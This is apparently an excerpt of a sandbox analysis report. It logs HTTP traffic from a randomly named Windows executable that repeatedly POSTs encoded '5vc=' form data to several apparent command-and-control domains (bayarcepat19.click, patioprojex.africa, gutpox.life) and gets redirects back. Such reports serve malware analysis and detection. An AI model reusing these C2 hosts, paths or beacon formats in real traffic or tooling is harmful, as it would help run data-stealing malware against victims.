                                                                                                                                            10192.168.2.661399188.114.97.3805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:52:21.962016106 CEST809OUTPOST /fxts/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.bayarcepat19.click
                                                                                                                                            Origin: http://www.bayarcepat19.click
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 232
                                                                                                                                            Referer: http://www.bayarcepat19.click/fxts/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 48 44 44 74 6c 73 39 48 70 33 44 6a 71 4b 4b 58 70 43 6e 35 32 54 54 4e 63 55 51 2b 48 41 47 2f 41 2f 68 56 62 4a 52 78 37 6e 70 6b 51 6f 75 4e 64 67 66 6d 53 67 37 6b 42 6e 34 77 49 6f 5a 72 55 65 41 31 44 6c 38 43 49 55 37 71 4a 61 71 50 35 63 46 2b 64 4e 34 2b 69 64 4d 72 71 66 76 30 33 63 68 45 45 64 44 7a 35 6a 35 6f 58 32 35 56 6d 59 54 72 51 72 33 67 78 4e 61 66 46 4b 4e 31 6a 4c 35 6c 34 2b 6e 30 2b 68 56 69 56 71 4a 59 61 34 76 76 2b 4f 54 72 65 31 42 41 58 55 6b 70 35 34 65 56 31 2f 52 34 54 4b 2b 74 57 65 49 34 77 59 6f 63 68 46 61 72 47 59 68 45 6f 33 74 51 5a 58 6a 4c 6e 51 48 32 34 46 70 38 61 54 54 67 72 68 76 33 78 61 65 56 33 34 4c 43 50 33 58 30 70 51 3d 3d
                                                                                                                                            Data Ascii: 5vc=HDDtls9Hp3DjqKKXpCn52TTNcUQ+HAG/A/hVbJRx7npkQouNdgfmSg7kBn4wIoZrUeA1Dl8CIU7qJaqP5cF+dN4+idMrqfv03chEEdDz5j5oX25VmYTrQr3gxNafFKN1jL5l4+n0+hViVqJYa4vv+OTre1BAXUkp54eV1/R4TK+tWeI4wYochFarGYhEo3tQZXjLnQH24Fp8aTTgrhv3xaeV34LCP3X0pQ==
                                                                                                                                            Oct 10, 2024 12:52:22.411324024 CEST849INHTTP/1.1 301 Moved Permanently
                                                                                                                                            Date: Thu, 10 Oct 2024 10:52:22 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 167
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: max-age=3600
                                                                                                                                            Expires: Thu, 10 Oct 2024 11:52:22 GMT
                                                                                                                                            Location: https://www.bayarcepat19.click/fxts/
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BCkCGMJV0jIScMzgrwNMHoUXEPKEN2HY19Y3DZ%2F084VjABIn17Z2KxYXSgatflRNN63hWaLwHUHuEvetGJiRFPhN7mGimfiPpBYvdLWJ55tAlO6BCAMU5e2DMtGsOplNECRLKq3HOP9G"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8d060f7fb8734332-EWR
                                                                                                                                            alt-svc: h2=":443"; ma=60
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            11192.168.2.661400188.114.97.3805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:52:24.530751944 CEST1822OUTPOST /fxts/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.bayarcepat19.click
                                                                                                                                            Origin: http://www.bayarcepat19.click
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 1244
                                                                                                                                            Referer: http://www.bayarcepat19.click/fxts/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 48 44 44 74 6c 73 39 48 70 33 44 6a 71 4b 4b 58 70 43 6e 35 32 54 54 4e 63 55 51 2b 48 41 47 2f 41 2f 68 56 62 4a 52 78 37 6d 52 6b 51 62 32 4e 63 48 72 6d 54 67 37 6b 50 48 34 39 49 6f 5a 4d 55 65 59 78 44 6c 67 38 49 57 44 71 62 49 79 50 2f 74 46 2b 55 4e 34 2b 39 4e 4d 71 75 66 76 62 33 63 52 41 45 65 37 7a 35 6a 35 6f 58 7a 39 56 6d 4a 54 72 53 72 33 6a 6d 39 61 62 42 4b 4e 4a 6a 4c 67 51 34 2b 79 4c 2b 56 68 69 56 4f 70 59 4b 61 33 76 6a 65 54 74 66 31 41 64 58 55 67 32 35 34 44 6b 31 2b 31 43 54 4b 61 74 54 35 35 51 6b 49 6b 30 33 6a 61 4d 54 65 31 39 6d 33 35 61 65 6d 47 32 6e 78 69 65 2b 6c 74 54 55 57 44 4a 68 69 47 50 79 71 65 59 7a 4e 57 57 50 6a 47 71 38 39 6c 30 62 54 75 56 32 56 51 61 74 71 42 48 59 54 70 6e 43 70 65 75 36 54 37 6a 56 45 6b 6a 56 4d 76 6e 58 72 57 2f 49 45 64 34 44 4d 44 76 4f 36 74 4f 6e 63 77 67 34 6d 2b 41 6d 57 38 7a 72 4f 6f 4d 65 4d 34 63 36 74 72 6d 79 6a 70 4d 6b 43 51 75 62 63 75 62 49 4b 71 63 69 66 49 4d 6e 34 4a 65 31 4e 66 32 39 65 39 63 41 45 [TRUNCATED]
                                                                                                                                            Data Ascii: 5vc=HDDtls9Hp3DjqKKXpCn52TTNcUQ+HAG/A/hVbJRx7mRkQb2NcHrmTg7kPH49IoZMUeYxDlg8IWDqbIyP/tF+UN4+9NMqufvb3cRAEe7z5j5oXz9VmJTrSr3jm9abBKNJjLgQ4+yL+VhiVOpYKa3vjeTtf1AdXUg254Dk1+1CTKatT55QkIk03jaMTe19m35aemG2nxie+ltTUWDJhiGPyqeYzNWWPjGq89l0bTuV2VQatqBHYTpnCpeu6T7jVEkjVMvnXrW/IEd4DMDvO6tOncwg4m+AmW8zrOoMeM4c6trmyjpMkCQubcubIKqcifIMn4Je1Nf29e9cAEQqf0u7+gt2QNGWSHoLgZpujACo9gKjGEKnJsEFanrk0Ud9FWgT8ZqJ4WLaiD7Ik5itWqcCn7m3R1T715ZawXhSnLpL7EG6WxWSOrA9/RYOZHyr+ixqEzhUrB0kt3pb9CjsYxc0lZ5OGOj7BamYaVzj7QN7AfcbTSdR5vnipdT+5jaqM11pcW8JZ/jfLYEGEl6e35NmfLwjW44AFDb4tQiYkDta9oXNT6NfBh8pFsitSmx/bOz2zO0drA9TGAgIoMmCs19fjiQy4l6vuL7i7o2FEfxCi/ujMMSc3NtebM681dyf6Wg81SRGXjVDmssjsBZimxQoQH7X2CgvnN2FB3S1kCnS+lJIeMC/dUuZoa0idzDrvTESBfHZ6Ni3vzH7nmZ1ZRGLmRAwpWLvF+CJOjJdxIfp+GKD64ioqFKtcZ1bz5fZbvTDlp6E9GsXOYM/sFOqT1fJaP4UlnhgItYGf+eoEDMmhb6YNaoB1r68j7aDhvHR8dmRKaZE/jL1M1uy0dRn/fvXDZwg5v/g1dRp9i3OS4iVzsZVZSkH1ZpsYlTxdO7x5X3T87gITSKBeVjnAvoK3mQfNEPGxcyy30ZLL/cVG3yoVlzttVgjZ5iXk49d1HXyx8kNti7CADjr5eiRt3YCgrQML04eXO19IJxXomKQgeEDiIGYL2fF [TRUNCATED]
                                                                                                                                            Oct 10, 2024 12:52:24.993253946 CEST855INHTTP/1.1 301 Moved Permanently
                                                                                                                                            Date: Thu, 10 Oct 2024 10:52:24 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 167
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: max-age=3600
                                                                                                                                            Expires: Thu, 10 Oct 2024 11:52:24 GMT
                                                                                                                                            Location: https://www.bayarcepat19.click/fxts/
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w18Iqr%2B%2BbQQh7OCnIrAsKH5r4X11FtHKEjQ9Sxy%2BzsEx4%2BaqmEtSeTWMwAJLglzVGA7aRthZsM4ePhUK6Gf4kf7nP46fH5OnKFMid%2BFEXmMUYwfb4HQ9wLKGH2Rb8otm9vRoKejtzQJ9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8d060f8fdded8c4e-EWR
                                                                                                                                            alt-svc: h2=":443"; ma=60
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            12192.168.2.661401188.114.97.3805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:52:27.070091009 CEST511OUTGET /fxts/?5vc=KBrNmZFmj0ul2oD2qgnroh/wQ2h5AjW2d9F4abtF0F4CaovzTwTYRyu6DykZf8dcdN4xXWNYZBLXZ4+qzslzTuV7y9B6gd/Ri+hABrjyhRVbSEt0nKDUfa/P8q39BOk9hsMan7o=&lLYL=kvUX HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Host: www.bayarcepat19.click
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Oct 10, 2024 12:52:27.706882000 CEST1022INHTTP/1.1 301 Moved Permanently
                                                                                                                                            Date: Thu, 10 Oct 2024 10:52:27 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 167
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: max-age=3600
                                                                                                                                            Expires: Thu, 10 Oct 2024 11:52:27 GMT
                                                                                                                                            Location: https://www.bayarcepat19.click/fxts/?5vc=KBrNmZFmj0ul2oD2qgnroh/wQ2h5AjW2d9F4abtF0F4CaovzTwTYRyu6DykZf8dcdN4xXWNYZBLXZ4+qzslzTuV7y9B6gd/Ri+hABrjyhRVbSEt0nKDUfa/P8q39BOk9hsMan7o=&lLYL=kvUX
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oib4zQKejwFLVE7V59lnCe%2FLGnTvzzGSWKQR1xxkAKQclF41kET21T%2Ff9dkNIoCjVeHgVJrvQ7Bv1TFAcejIL78OO0acXI1KFM%2FShq67V7bXHcRJnASKRGbP7uv9qjovYIb2AIbXpE5M"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8d060fa0cff61986-EWR
                                                                                                                                            alt-svc: h2=":443"; ma=60
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            13192.168.2.661402197.189.237.186805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:52:33.153635979 CEST785OUTPOST /x557/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.patioprojex.africa
                                                                                                                                            Origin: http://www.patioprojex.africa
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 208
                                                                                                                                            Referer: http://www.patioprojex.africa/x557/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 74 67 6f 4d 75 36 2b 44 7a 34 32 77 65 6d 36 6b 62 4a 70 49 64 53 49 76 59 53 36 76 73 56 52 39 62 33 41 6e 69 37 46 63 4e 74 54 71 32 6e 43 71 39 2f 45 63 38 6c 49 76 52 4a 45 65 34 61 6e 6a 4a 49 4b 64 77 6c 57 4d 51 6b 6c 4f 6c 73 66 35 6d 47 38 67 4e 6b 6d 48 61 7a 46 79 61 47 69 66 54 37 44 37 35 4c 6c 4e 32 4d 62 34 4b 47 79 62 57 39 43 68 65 35 58 32 63 32 77 38 54 42 57 49 71 56 4c 6a 2b 4d 49 65 64 47 6b 58 4e 57 42 74 77 62 34 4c 46 35 64 6b 42 55 68 38 4c 67 41 47 70 4d 64 76 34 4e 51 35 6e 78 67 55 4f 70 61 72 77 46 43 69 78 49 73 72 4a 71 59 6e 34 59 6b 58 30 44 6f 37 68 34 70 53 53 41 33 53
                                                                                                                                            Data Ascii: 5vc=tgoMu6+Dz42wem6kbJpIdSIvYS6vsVR9b3Ani7FcNtTq2nCq9/Ec8lIvRJEe4anjJIKdwlWMQklOlsf5mG8gNkmHazFyaGifT7D75LlN2Mb4KGybW9Che5X2c2w8TBWIqVLj+MIedGkXNWBtwb4LF5dkBUh8LgAGpMdv4NQ5nxgUOparwFCixIsrJqYn4YkX0Do7h4pSSA3S


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            14192.168.2.661403197.189.237.186805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:52:35.695771933 CEST809OUTPOST /x557/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.patioprojex.africa
                                                                                                                                            Origin: http://www.patioprojex.africa
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 232
                                                                                                                                            Referer: http://www.patioprojex.africa/x557/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 74 67 6f 4d 75 36 2b 44 7a 34 32 77 66 47 6d 6b 49 70 56 49 63 79 49 73 42 53 36 76 36 6c 51 32 62 33 4d 6e 69 35 70 4d 4e 2f 33 71 32 46 4b 71 38 2b 45 63 2f 6c 49 76 4a 5a 45 66 6e 71 6d 4f 4a 49 58 2b 77 68 65 4d 51 6e 5a 4f 6c 74 76 35 6c 78 6f 6e 63 6b 6d 46 51 6a 46 77 43 6d 69 66 54 37 44 37 35 49 5a 6e 32 4d 44 34 4b 31 36 62 57 63 43 69 41 70 58 78 4d 6d 77 38 58 42 57 4d 71 56 4c 56 2b 4e 45 6e 64 45 73 58 4e 54 39 74 77 76 73 45 4c 35 64 69 66 6b 67 4c 4f 51 4e 7a 70 61 55 76 78 4d 4d 76 35 41 67 43 50 66 62 78 73 32 43 42 6a 59 4d 70 4a 6f 41 56 34 34 6b 39 32 44 51 37 7a 76 6c 31 64 30 53 78 46 6a 7a 57 34 6d 7a 55 66 6b 48 59 6c 38 64 46 66 6e 6f 72 59 41 3d 3d
                                                                                                                                            Data Ascii: 5vc=tgoMu6+Dz42wfGmkIpVIcyIsBS6v6lQ2b3Mni5pMN/3q2FKq8+Ec/lIvJZEfnqmOJIX+wheMQnZOltv5lxonckmFQjFwCmifT7D75IZn2MD4K16bWcCiApXxMmw8XBWMqVLV+NEndEsXNT9twvsEL5difkgLOQNzpaUvxMMv5AgCPfbxs2CBjYMpJoAV44k92DQ7zvl1d0SxFjzW4mzUfkHYl8dFfnorYA==


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            15192.168.2.661404197.189.237.186805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:52:38.303812027 CEST1822OUTPOST /x557/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.patioprojex.africa
                                                                                                                                            Origin: http://www.patioprojex.africa
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 1244
                                                                                                                                            Referer: http://www.patioprojex.africa/x557/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 74 67 6f 4d 75 36 2b 44 7a 34 32 77 66 47 6d 6b 49 70 56 49 63 79 49 73 42 53 36 76 36 6c 51 32 62 33 4d 6e 69 35 70 4d 4e 2f 2f 71 32 77 47 71 39 64 38 63 2b 6c 49 76 58 4a 45 6b 6e 71 6e 4d 4a 49 4f 33 77 68 53 63 51 69 64 4f 6b 50 6e 35 75 6c 45 6e 56 6b 6d 46 59 44 46 74 61 47 69 76 54 37 54 2f 35 4c 68 6e 32 4d 44 34 4b 30 4b 62 47 64 43 69 43 70 58 32 63 32 77 4f 54 42 58 5a 71 52 66 72 2b 4e 41 6f 65 33 30 58 44 54 4e 74 6a 4d 45 45 44 35 64 67 65 6b 67 54 4f 51 42 61 70 62 38 4a 78 4d 6f 46 35 43 38 43 4f 66 65 72 70 46 4b 73 33 61 51 64 64 2f 77 46 33 6f 6b 32 33 43 55 72 39 74 52 66 54 6c 79 38 4a 30 7a 33 35 55 4f 56 5a 30 79 78 68 38 31 4c 4b 55 46 44 4b 4a 54 66 37 65 4d 72 6e 38 69 62 6f 77 44 69 63 4c 4d 68 56 52 4c 65 64 34 41 69 35 4c 6b 65 43 59 73 52 42 74 6f 76 76 63 77 34 51 4d 2b 6a 34 2b 58 7a 4b 73 54 75 62 6d 44 56 73 69 72 41 39 31 66 68 38 6a 4c 35 6b 36 44 38 66 6d 30 77 47 5a 66 32 44 4a 6a 65 62 48 76 53 4d 59 51 42 46 4a 6d 6c 54 64 6c 54 2f 43 78 52 57 4b [TRUNCATED]
                                                                                                                                            Data Ascii: 5vc=tgoMu6+Dz42wfGmkIpVIcyIsBS6v6lQ2b3Mni5pMN//q2wGq9d8c+lIvXJEknqnMJIO3whScQidOkPn5ulEnVkmFYDFtaGivT7T/5Lhn2MD4K0KbGdCiCpX2c2wOTBXZqRfr+NAoe30XDTNtjMEED5dgekgTOQBapb8JxMoF5C8COferpFKs3aQdd/wF3ok23CUr9tRfTly8J0z35UOVZ0yxh81LKUFDKJTf7eMrn8ibowDicLMhVRLed4Ai5LkeCYsRBtovvcw4QM+j4+XzKsTubmDVsirA91fh8jL5k6D8fm0wGZf2DJjebHvSMYQBFJmlTdlT/CxRWKYhqHlWWNSdsJ4hj50KeKQzo3EnS/oE2Cqe8pi5vmDZ+c9+GjYxeD/XTY/HsMpylfo6ZjPWcewYZnglo9GJw+3qZxpniAYPCu2/9Cfd7w5lTWaLa/9LMWKhF6yHdaJ3iGrebzQ2sAz/QooTTusaHfl/DR9lJfLJvXrX3Z+Us//4/oygbm/nmZTYQTgFNI/9nHmkTDfh6D8d0jrR/khl8YStgZtMNaSh99O3lFKfb+oBLNDfzieMY1uzyTHGfxk/pTaozeLeS1HqCwDvOtih0ilov4MGxXrvGQStoYgIsIG/DkPwKKiaIPpV63iHboJ9y91U/YYPXmbfGETuQ5t8YYvFfq8uEf8OK+8N1K/KDsCxhlv6qgfh4xFpf4PfuRtR5+WYLkHSwxflv91UboyutoDsrcqjoSKFpU2xuN69nF6szSfh0orWFBRa7TDVWpxhX6TL3QTXscrx+PBcIfaxH+nIWRAxsjpEXqBEz/XrmMHYUvFsV/BMhlA8O8uKy9O9LvpalM0XHdDu06wHOfyEKTgA/P3E+1Tkq9D4JzcNHM4fyrdRd9DxrD70H6ANzUX9S7gzVwRahFnubqejA1CKbJtH6A4PrmDAyy6ZHJvnFHmxnls2o1ZH907/+sGRVBMgzaaksNovPZvm93DA2KO9JardFmh8LM2obwrH [TRUNCATED]


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            16192.168.2.661405197.189.237.186805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:52:40.860795021 CEST511OUTGET /x557/?5vc=giAstKbG1JvvSEHvPZxdSSM3KyfVinJMbmE6i5V8cuPr9HW8zP8h8UUcUfsu4P3tPpyGgBHfZyFCt865pXgydxC+b0QJblKsDInl9u5dqfz1OH+RWteaPpXHUBQMRwPVkFLc/Ks=&lLYL=kvUX HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Host: www.patioprojex.africa
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Oct 10, 2024 12:52:42.510890961 CEST504INHTTP/1.1 301 Moved Permanently
                                                                                                                                            Date: Thu, 10 Oct 2024 10:52:41 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            X-Powered-By: PHP/8.2.24
                                                                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                            X-Redirect-By: WordPress
                                                                                                                                            Location: http://patioprojex.africa/x557/?5vc=giAstKbG1JvvSEHvPZxdSSM3KyfVinJMbmE6i5V8cuPr9HW8zP8h8UUcUfsu4P3tPpyGgBHfZyFCt865pXgydxC+b0QJblKsDInl9u5dqfz1OH+RWteaPpXHUBQMRwPVkFLc/Ks=&lLYL=kvUX
                                                                                                                                            Content-Length: 0
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            17192.168.2.66140767.223.117.189805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:52:47.640306950 CEST764OUTPOST /bcpd/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.gutpox.life
                                                                                                                                            Origin: http://www.gutpox.life
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 208
                                                                                                                                            Referer: http://www.gutpox.life/bcpd/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 35 32 2f 64 65 4b 42 44 63 61 73 30 2b 74 63 67 37 41 41 75 7a 30 54 6a 31 6b 45 59 46 41 45 75 64 44 4b 75 6a 62 4d 31 6c 6c 51 73 41 45 39 64 73 58 61 72 33 78 42 79 31 2b 7a 50 2b 71 45 50 4d 6f 35 34 6a 47 4d 71 57 42 74 57 52 6e 41 45 41 75 6b 4e 6a 69 36 59 31 61 58 62 63 6a 55 39 69 44 77 4a 6c 5a 34 52 36 6b 41 35 67 2f 54 4b 76 79 73 52 48 43 52 6f 75 76 4b 6d 44 2b 4a 6f 7a 4f 74 58 36 43 54 6f 43 46 52 36 72 4b 35 46 6d 61 67 38 63 61 37 30 42 61 6a 46 65 52 4d 47 35 7a 38 4c 6f 64 65 42 77 6a 38 4e 63 31 57 2f 44 74 46 46 7a 41 67 57 48 30 50 6e 6b 33 45 59 76 53 4a 7a 57 52 39 6f 42 36 7a 7a
